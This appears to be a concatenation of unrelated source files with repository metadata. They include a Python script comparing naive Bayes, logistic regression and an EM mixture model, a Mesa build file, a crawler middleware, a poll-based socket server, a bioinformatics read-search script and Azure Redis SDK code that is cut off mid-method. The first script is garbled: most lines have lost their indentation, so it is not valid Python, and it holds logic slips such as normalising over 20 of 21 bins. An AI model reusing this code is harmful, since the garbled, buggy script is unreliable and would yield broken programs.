    print(acc_str)
    print(acc_test_str)
def multinomialNB(x,y,x_test,y_test):
    # multinomial naive Bayes
#create the Multinomial Naive Bayesian Classifier
clf = MultinomialNB(alpha = 0.01)
    clf.fit(x, y)
y_hat = clf.predict(x)
y_test_hat = clf.predict(x_test)
acc = np.mean(y_hat.ravel() == y.ravel())
acc_test = np.mean(y_test_hat.ravel() == y_test.ravel())
print("朴素贝叶斯:多项式分布")
acc_str = u'训练集准确率:%.2f%%' % (acc * 100)
acc_test_str = u'测试集准确率:%.2f%%' % (acc_test * 100)
print(acc_str)
print(acc_test_str)
def logistic(x,y,x_test,y_test):
    classifier = LogisticRegression()  # all hyperparameters left at their defaults
    classifier.fit(x, y)  # learn from the training data; no return value needed
y_hat = classifier.predict(x)
y_test_hat = classifier.predict(x_test)
acc = np.mean(y_hat.ravel() == y.ravel())
acc_test = np.mean(y_test_hat.ravel() == y_test.ravel())
print("logistic回归:")
acc_str = u'训练集准确率:%.2f%%' % (acc * 100)
acc_test_str = u'测试集准确率:%.2f%%' % (acc_test * 100)
print(acc_str)
print(acc_test_str)
def gaussianNB(x,y,x_test,y_test):
    # Gaussian naive Bayes
    # create the Gaussian naive Bayes classifier
clf = GaussianNB()
    clf.fit(x, y)
y_hat = clf.predict(x)
y_test_hat = clf.predict(x_test)
acc = np.mean(y_hat.ravel() == y.ravel())
acc_test = np.mean(y_test_hat.ravel() == y_test.ravel())
print("朴素贝叶斯:高斯分布")
acc_str = u'训练集准确率:%.2f%%' % (acc * 100)
acc_test_str = u'测试集准确率:%.2f%%' % (acc_test * 100)
print(acc_str)
print(acc_test_str)
def init_with_bayes(pi, phi, data, y):
    # initialize the EM parameters pi / phi from labeled Bayes statistics
    # (note: rebinding pi and phi below never reaches the caller; the function
    # would have to return them for this initialization to take effect)
pi = np.array([0.0] * K)
for i in range(len(data)):
pi[int(y[i])-1] += 1
pi = pi/sum(pi)
phi = np.array([[[0.0]*21] *K] *3)
print(phi.shape)
for i in range(3):
for j in range(len(data)):
k = int(data[j][i])
lable = int(y[j])-1
phi[i][lable][k] += 1
for j in range(K):
phi[i][j] = phi[i][j]/sum(phi[i][j])
def EM():
data = np.loadtxt('1.csv', dtype=np.float, delimiter=',', skiprows=1)
# data = data[50000:70000]
print(data.shape)
xx, x, y = np.split(data, [1,4, ], axis=1)
x, x_test, y, y_test = train_test_split(x, y, train_size=0.8, random_state=0)
    # gmm_deal(x,y,x_test,y_test)
    # naive Bayes classification: multinomial
    # multinomialNB(x,y,x_test,y_test)
    # naive Bayes classification: Gaussian
    # gaussianNB(x,y,x_test,y_test)
    # logistic(x,y,x_test,y_test)
    # preprocessing: discretize the continuous data
    pre_deal_data(x,x_test)
    # naive Bayes classification: multinomial
    # multinomialNB(x,y,x_test,y_test)
    # naive Bayes classification: Gaussian
    # gaussianNB(x,y,x_test,y_test)
    # logistic(x,y,x_test,y_test)
    # gmm_deal(x,y,x_test,y_test)
    # unsupervised naive Bayes classification
    x = x%100
    x_test = x_test%100  # strip the k + i*100 per-column offset added earlier
data = x
n, d = data.shape
print(data.shape)
    # initialize the parameters
    # class prior pi
    pi = abs(np.random.standard_normal(K))  # 7 classes [0-6]
    pi = pi/sum(pi)
    # per dimension: a multinomial over the discrete values for each class, randomly initialized
phi = np.array([[[0.0]*21] *K] *3)
print(phi.shape)
for i in range(3):
for j in range(K):
phi[i][j] = np.array(abs(np.random.standard_normal(21)))
# print(phi[i][j])
phi[i][j] = phi[i][j]/sum(phi[i][j])
    # per-sample class membership probabilities (responsibilities)
    gamma = np.array([[0.0]*K]*len(data))
    # optionally initialize pi and phi from labeled prior statistics
    # init_with_bayes(pi, phi, data, y)
    print(pi)  # confirm a fresh initialization on every run
num_iter = 300
# EM
for n_iter in range(num_iter):
# E
expect = 0.0
for i in range(len(data)):
tot = 0.0
for k in range(K):
gamma[i][k] = pi[k] * (phi[0][k][data[i][0]]) * (phi[1][k][data[i][1]]) * (phi[2][k][data[i][2]])
tot += gamma[i][k]
for k in range(K):
gamma[i][k] /= tot
expect += tot
# M
# pi
for k in range(K):
tot = 0.0
for i in range(len(data)):
tot += gamma[i][k]
pi[k] = tot/len(data)
# phi
        for i in range(3):  # for the i-th feature dimension
for j in range(len(data)):
                lable = data[j][i]  # value of sample j in dimension i
for k in range(K):
phi[i][k][lable] += gamma[j][k]
            for k in range(K):  # normalize each row
tot = 0.0
for j in range(20):
tot += phi[i][k][j]
for j in range(20):
phi[i][k][j] /= tot
if n_iter % 1 == 0:
print(n_iter, ":\t", math.log(expect))
# print(pi,gamma[0])
print_ans(gamma, phi, pi, data, y, x_test, y_test, n_iter)
"""
    # naive Bayes classification: multinomial
    multinomialNB(x,y,x_test,y_test)
    # naive Bayes classification: Gaussian
gaussianNB(x,y,x_test,y_test)
"""
if __name__ == '__main__':
EM()
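# For reference, the updates implemented by the loops above (a standard EM
# for a mixture of per-dimension multinomials, written out as an aid to
# reading the code):
#   E-step: gamma[i][k] = pi[k] * prod_d phi[d][k][x[i][d]], normalized over k
#   M-step: pi[k] = (1/N) * sum_i gamma[i][k]
#           phi[d][k][v] proportional to the sum of gamma[i][k] over
#           samples i with x[i][d] == v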
|
[
"1390880230@qq.com"
] |
1390880230@qq.com
|
90ad84c9ee8207cfb8f4c72a00d0a55af67734cd
|
90d13ffb6fa1988242886c3e55e4b555fa7d8ad1
|
/utils/Mesa-7.10/src/gallium/winsys/radeon/drm/SConscript
|
2dbf61a7ba3bf214c177ec15747c04a38ecfe0b0
|
[] |
no_license
|
mclumd/erewhon_systems
|
2c798cd303ca2cb19e80c93c88303af8b9aed5a6
|
93655a96415a01d8f5e49a1f2c244cbfd22b65f2
|
refs/heads/master
| 2021-01-17T16:22:53.528996
| 2016-08-03T19:35:52
| 2016-08-03T19:35:52
| 64,771,684
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 356
|
Import('*')
env = env.Clone()
radeon_sources = [
'radeon_drm_buffer.c',
'radeon_drm_common.c',
'radeon_r300.c',
]
env.ParseConfig('pkg-config --cflags libdrm_radeon')
env.Append(CPPPATH = '#/src/gallium/drivers/r300')
radeonwinsys = env.ConvenienceLibrary(
    target = 'radeonwinsys',
source = radeon_sources,
)
Export('radeonwinsys')
|
[
"cmaxey@payday.cs.umd.edu"
] |
cmaxey@payday.cs.umd.edu
|
|
809cbea84a46077f1717e7f0f464b0e2cbe9f67d
|
e53bb08582973a3faa76e2f2210086a7019a528f
|
/middlewares/response_middleware.py
|
fb774b75c026943704dd7671c12137487b6557db
|
[
"MIT"
] |
permissive
|
f840415070/genius
|
bb8aba51fac29e92bc0b1c833dfe3f52a70fba68
|
87e20350f98e84bc81b727a793d2dda37ffb3d03
|
refs/heads/master
| 2023-06-01T21:56:19.057610
| 2020-04-20T03:45:53
| 2020-04-20T03:45:53
| 233,549,982
| 4
| 1
|
MIT
| 2023-05-22T22:37:54
| 2020-01-13T08:44:40
|
Python
|
UTF-8
|
Python
| false
| false
| 768
|
py
|
# -*- coding: utf-8 -*-
'''
@Date: 2019/12/30
@Author: fanyibin
@Description: response middleware
'''
from frame_library.singleton import Singleton
from frame_library.logger import get_log_config
class ResMiddleware(metaclass=Singleton):
def __init__(self):
self.log = get_log_config()
def check_response(self, res):
if not res:
            self.log.warning('Empty response body, nothing to parse; moving on to the next seed.')
return None
return res
def handle_response(self, res, seed):
resp = self.check_response(res)
if resp is None:
return resp
if seed.encoding is None:
seed.encoding = 'utf-8'
resp.encoding = seed.encoding
resp.close()
return resp
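# Usage sketch (assumptions: `res` is a response object handed over by the
# fetch layer and `seed` carries an `encoding` attribute, as the code above
# expects):
#
#   mw = ResMiddleware()
#   resp = mw.handle_response(res, seed)
#   if resp is not None:
#       ...  # parse resp downstream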
|
[
"f84041507@163.com"
] |
f84041507@163.com
|
f634ad49ba912458c7afbbb41671d6a330f3eb88
|
a3df5320fd2f17e2a7e873f3747ae28bb90f1f68
|
/poll_server.py
|
e238232378b50ddc350bc1dba7063d9beb9a6dac
|
[] |
no_license
|
AsuraChj/AID2006
|
6dc4e789f1ce84dd2bb11fc3b138d84084ec5711
|
9ff6ad7ab8a722682dba4de145595e2b608091bc
|
refs/heads/master
| 2022-12-02T06:21:43.991644
| 2020-08-21T07:52:26
| 2020-08-21T07:52:26
| 288,695,308
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,363
|
py
|
"""
基于 POLL方法的 IO多路复用网络并发
"""
from socket import *
from select import *
# 创建好监听套接字
sockfd = socket()
sockfd.bind(('0.0.0.0', 8888))
sockfd.listen(5)
# 与非阻塞IO配合防止传输过程阻塞
sockfd.setblocking(False)
# 创建poll对象
p = poll()
# 准备IO进行监控 map字典用于查找IO对象,必须与register一致
map = {sockfd.fileno(): sockfd}
p.register(sockfd,POLLIN)
# 循环监控IO发生
while True:
# 开始监控IO events-->[(fileno,event),(),]
events = p.poll()
# 伴随监控的IO的增多,就绪的IO情况也会复杂
# 分类讨论 分两类 sockfd -- connfd
for fd, event in events:
# 有客户端连接
if fd == sockfd.fileno():
connfd, addr = map[fd].accept()
print("Connect from", addr)
connfd.setblocking(False)
p.register(connfd, POLLIN) # 增加监控
map[connfd.fileno()] = connfd # 维护字典
elif event == POLLIN:
# 某个客户端发消息给我
data = map[fd].recv(1024).decode()
if not data:
# 客户端退出
p.unregister(fd) # 移除监控
map[fd].close()
del map[fd]
continue
print("收到:", data)
map[fd].send(b'ok')
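# A minimal client for exercising this server (a sketch; run it in a
# separate process while the server is up):
#
#   from socket import socket
#   c = socket()
#   c.connect(('127.0.0.1', 8888))
#   c.send(b'hello')
#   print(c.recv(1024))  # expect: b'ok'
#   c.close()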
|
[
"2592803595@qq.com"
] |
2592803595@qq.com
|
b461cd6b2fba3f2bf2aace6e95f110b5921ca691
|
59ad7563b7c64e0ec422653b3feba9675cc228d4
|
/hr_release/models/__init__.py
|
8f560a335127e7fe9c67f29209b69c11fbfc3b1b
|
[] |
no_license
|
ammaralsabba/ALDEEBL-FISH
|
32a628f2d047340b656077473633d16e08b77737
|
95f0a72a75c109c5bad886d0e534d5295864bc3f
|
refs/heads/master
| 2020-04-26T13:00:39.538879
| 2019-03-04T14:53:42
| 2019-03-04T14:53:42
| 173,567,681
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 125
|
py
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from . import hr_release
|
[
"noreply@github.com"
] |
ammaralsabba.noreply@github.com
|
5409dc2a6e175f7cdf290e02b85c7adea95e1e71
|
69d219254ac51410dada23d9003a114daf2aa162
|
/scripts/sequence_feature_frequencies.py
|
ec600f0e12d90cbf1aaa10a07f618625cb36db8e
|
[] |
no_license
|
skerker/utr_analysis
|
5287f39fe2981623e768b7385bc6c891d5f9d376
|
ba57006cdf6719195fdaa5e92fe55c4652c9ffc4
|
refs/heads/master
| 2021-08-14T08:20:18.432931
| 2017-11-15T03:53:31
| 2017-11-15T03:53:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,506
|
py
|
#!/usr/bin/env python
"""
Keith Hughitt
2014/03/17
Finds reads containing either Poly(A) or Poly(T) tracts and attempts to guess
whether those sequences are a part of the genome, or come from a
poly-adenylation site.
The purpose of this script is to try and provide some basic guidelines for
where to look for poly-adenylation reads.
"""
import os
import glob
import re
from Bio import SeqIO, Seq
def main():
# Select species and sample to query
target = 'lmajor' # 'tcruzi'
if target == 'lmajor':
# Samples to query
base_dir = "/cbcb/lab/nelsayed/raw_data/lminfectome"
hpgl_id = "HPGL0075" # procyclic (pathogen only)
# output directory
outdir = os.path.join('output', 'lmajor_hpgl0075')
# Genome
genome = os.path.join("/cbcb/lab/nelsayed/ref_data/lmajor_friedlin/genome",
"TriTrypDB-7.0_LmajorFriedlin_Genome.fasta")
# L. major SL sequence and its reverse complement
sl = "AACTAACGCTATATAAGTATCAGTTTCTGTACTTTATTG"
reverse_sl = "CAATAAAGTACAGAAACTGATACTTATATAGCGTTAGTT"
else:
# Samples to query
base_dir = "/cbcb/lab/nelsayed/raw_data/tcruzir21"
hpgl_id = "HPGL0250" # trypomastigote (pathogen only)
# output directory
outdir = os.path.join('output', 'tcruzi_hpgl0250')
# Genome
genome = os.path.join("/cbcb/lab/nelsayed/ref_data/tcruzi_clbrener/genome/tc_esmer",
"TriTrypDB-6.0_TcruziCLBrenerEsmeraldo-like_Genome.fasta")
# T. cruzi SL sequence and reverse complement
sl = "AACTAACGCTATTATTGATACAGTTTCTGTACTATATTG"
reverse_sl = "CAATATAGTACAGAAACTGTATCAATAATAGCGTTAGTT"
# RNA-Seq read filepaths
reads = glob.glob(os.path.join(base_dir, hpgl_id, 'processed/*.fastq'))
# regular expressions
min_length = 16
# spliced leader regular expressions
sl_regex = '|'.join(["^" + sl[-x:] for x in range(min_length, len(sl) + 1)])
reverse_sl_regex = '|'.join(
[reverse_sl[-x:] + "$" for x in range(min_length, len(reverse_sl) + 1)]
)
search_patterns = {
"polya_left": "^A{%d,}" % min_length,
"polyt_left": "^T{%d,}" % min_length,
"polya_right": "A{%d,}$" % min_length,
"polyt_right": "T{%d,}$" % min_length,
"sl_left": sl_regex,
"rcsl_right": reverse_sl_regex
}
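    # For intuition: "polya_left" matches reads that start with at least
    # min_length A's, while sl_regex matches any suffix of the spliced
    # leader of length >= min_length anchored at the read start (e.g. for
    # the L. major SL above, the last 16 nt give "^TTTCTGTACTTTATTG").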
    # count occurrences of each sequence in reads
for name,regex in search_patterns.items():
print("Processing %s" % name)
output_dir = os.path.join(outdir, name)
count_seq_hits(re.compile(regex), reads, genome, output_dir)
def count_seq_hits(regex, reads, genome, outdir, max_reads=float('inf')):
"""Counts the number of occurances of a specified sequence in a collection
of reads."""
# load genome as a list of chromosome SeqRecords
chromosomes = list(SeqIO.parse(genome, format='fasta'))
# lists to keep track of different types of read matches
with_feature = []
with_feature_rc = []
without_feature = []
without_feature_rc = []
no_match = []
# Iterate through sample files
for filepath in reads:
for i, entry in enumerate(readfq(open(filepath)), 1):
# stop once we have reached desired number of reads
if i > max_reads:
break
# get read sequence and id
read_id = entry[0]
read = entry[1]
# check for sequence pattern in read
match = re.search(regex, read)
# stop here if read doesn't contain sequence of interest
if match is None:
continue
# otherwise check genome for read and trimmed read
if (len(read) - match.end()) >= match.start():
trimmed_read = read[match.end():]
else:
trimmed_read = read[:match.start()]
# reverse complement
rc = str(Seq.Seq(read).reverse_complement())
trimmed_rc = str(Seq.Seq(trimmed_read).reverse_complement())
# if found, see if it appears in the genome as-is, or when trimmed
# to remove matched feature
genome_match = False
for chromosome in chromosomes:
# full read
if chromosome.seq.count(read) > 0:
with_feature.append(read_id)
genome_match = True
# full read (reverse complement)
elif chromosome.seq.count(rc) > 0:
with_feature_rc.append(read_id)
genome_match = True
# trimmed read
elif chromosome.seq.count(trimmed_read) > 0:
without_feature.append(read_id)
genome_match = True
# trimmed read (reverse complement)
elif chromosome.seq.count(trimmed_rc) > 0:
without_feature_rc.append(read_id)
genome_match = True
# stop checking once match is found in genome
if genome_match is True:
break
# no match
if not genome_match:
no_match.append(read_id)
# Save output
if not os.path.exists(outdir):
os.makedirs(outdir, mode=0o755)
fp = open(os.path.join(outdir, 'full_read_matches.txt'), 'w')
fp.write('\n'.join(with_feature) + '\n')
fp.close()
fp = open(os.path.join(outdir, 'full_read_reverse_matches.txt'), 'w')
fp.write('\n'.join(with_feature_rc) + '\n')
fp.close()
fp = open(os.path.join(outdir, 'trimmed_read_matches.txt'), 'w')
fp.write('\n'.join(without_feature) + '\n')
fp.close()
fp = open(os.path.join(outdir, 'trimmed_read_reverse_matches.txt'), 'w')
fp.write('\n'.join(without_feature_rc) + '\n')
fp.close()
fp = open(os.path.join(outdir, 'no_matches.txt'), 'w')
fp.write('\n'.join(no_match) + '\n')
fp.close()
# FASTQ parser
# source: https://github.com/lh3/readfq
def readfq(fp): # this is a generator function
last = None # this is a buffer keeping the last unprocessed line
while True: # mimic closure; is it a bad idea?
if not last: # the first record or a record following a fastq
for l in fp: # search for the start of the next record
if l[0] in '>@': # fasta/q header line
last = l[:-1] # save this line
break
if not last: break
name, seqs, last = last[1:].partition(" ")[0], [], None
for l in fp: # read the sequence
if l[0] in '@+>':
last = l[:-1]
break
seqs.append(l[:-1])
if not last or last[0] != '+': # this is a fasta record
yield name, ''.join(seqs), None # yield a fasta record
if not last: break
else: # this is a fastq record
seq, leng, seqs = ''.join(seqs), 0, []
for l in fp: # read the quality
seqs.append(l[:-1])
leng += len(l) - 1
if leng >= len(seq): # have read enough quality
last = None
yield name, seq, ''.join(seqs); # yield a fastq record
break
if last: # reach EOF before reading enough quality
yield name, seq, None # yield a fasta record instead
break
if __name__ == "__main__":
main()
|
[
"keith.hughitt@gmail.com"
] |
keith.hughitt@gmail.com
|
313b7063b5198fdd744db7126fed0b419cf3d866
|
ddc8b1910f7e96259e9eedc37c25a7e1b48ca11d
|
/iedb/__init__.py
|
f2dfe06a063a978ecd72ab18fea6f0f2dacd0905
|
[
"MIT"
] |
permissive
|
venkataduvvuri/iedb-python
|
be202dca4307c875d4fa32779eb6c3eedb8cffbd
|
3412eec81526f6166f40b0c4698635b66153fb17
|
refs/heads/master
| 2023-04-21T02:21:02.984476
| 2021-05-11T03:23:27
| 2021-05-11T03:23:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 153
|
py
|
from iedb.api import (
query_mhci_binding,
query_mhcii_binding,
query_tcell_epitope,
query_peptide_prediction,
query_bcell_epitope
)
|
[
"mattfemia1@gmail.com"
] |
mattfemia1@gmail.com
|
15220c116e3826ff490fb6baa981d35c31cbd69b
|
5537eec7f43098d216d2b550678c8d10b2a26f09
|
/venv/ansible/lib/python2.7/site-packages/azure/mgmt/redis/operations/redis_operations.py
|
15567caaf0b2cda2a209918f901f6e1af1ab2df3
|
[] |
no_license
|
wipro-sdx/Automation
|
f0ae1512b8d9d491d7bacec94c8906d06d696407
|
a8c46217d0fbe51a71597b5db87cbe98ed19297a
|
refs/heads/master
| 2021-07-08T11:09:05.314435
| 2018-05-02T07:18:54
| 2018-05-02T07:18:54
| 131,812,982
| 0
| 1
| null | 2020-07-23T23:22:33
| 2018-05-02T07:15:28
|
Python
|
UTF-8
|
Python
| false
| false
| 33,162
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrestazure.azure_operation import AzureOperationPoller
import uuid
from .. import models
class RedisOperations(object):
"""RedisOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
def create_or_update(
self, resource_group_name, name, parameters, custom_headers=None, raw=False, **operation_config):
"""Create a redis cache, or replace (overwrite/recreate, with potential
downtime) an existing cache.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param name: The name of the redis cache.
:type name: str
:param parameters: Parameters supplied to the CreateOrUpdate redis
operation.
:type parameters: :class:`RedisCreateOrUpdateParameters
<azure.mgmt.redis.models.RedisCreateOrUpdateParameters>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`RedisResourceWithAccessKey
<azure.mgmt.redis.models.RedisResourceWithAccessKey>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cache/Redis/{name}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'RedisCreateOrUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [201, 200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 201:
deserialized = self._deserialize('RedisResourceWithAccessKey', response)
if response.status_code == 200:
deserialized = self._deserialize('RedisResourceWithAccessKey', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def delete(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""Deletes a redis cache. This operation takes a while to complete.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param name: The name of the redis cache.
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cache/Redis/{name}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def get(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""Gets a redis cache (resource description).
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param name: The name of the redis cache.
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`RedisResource <azure.mgmt.redis.models.RedisResource>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cache/Redis/{name}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('RedisResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def list_by_resource_group(
self, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Gets all redis caches in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`RedisResourcePaged
<azure.mgmt.redis.models.RedisResourcePaged>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cache/Redis/'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.RedisResourcePaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.RedisResourcePaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def list(
self, custom_headers=None, raw=False, **operation_config):
"""Gets all redis caches in the specified subscription.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`RedisResourcePaged
<azure.mgmt.redis.models.RedisResourcePaged>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Cache/Redis/'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.RedisResourcePaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.RedisResourcePaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def list_keys(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""Retrieve a redis cache's access keys. This operation requires write
permission to the cache resource.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param name: The name of the redis cache.
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`RedisListKeysResult
<azure.mgmt.redis.models.RedisListKeysResult>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cache/Redis/{name}/listKeys'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('RedisListKeysResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def regenerate_key(
